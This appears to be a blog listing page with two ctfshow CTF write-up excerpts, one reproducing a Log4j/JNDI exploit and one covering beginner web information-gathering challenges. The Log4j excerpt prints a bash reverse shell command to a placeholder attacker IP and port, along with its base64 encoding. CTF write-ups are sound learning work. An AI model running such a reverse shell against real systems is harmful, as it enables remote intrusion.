ctfshow
文章平均质量分 56
whathay
一个菜鸟
展开
-
ctfshow Log4j复现wp
声明:该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关JNDIExploit先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码注:IP填vps公网ip,PORT要和nc监听的端口对应bash -i >& /dev/tcp/IP/PORT 0>&1# => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE=# => Ym原创 2022-01-14 16:04:50 · 2920 阅读 · 0 评论 -
ctfshow WEB入门 信息收集 1-20
web1题目:开发注释未及时删除查看页面源代码即可web2题目:js把鼠标右键和f12屏蔽了方法一:禁用JavaScript方法二:url前面加上view-source:web3题目:抓个包试试抓包在请求包发现flagweb4题目:总有人把后台地址写入robots访问robots.txt后得到后台地址,访问得到flagweb5题目:phps源码泄露访问index.phps下载源码拿到flagweb6题目:解压源码到当前目.原创 2021-12-09 17:32:15 · 2022 阅读 · 0 评论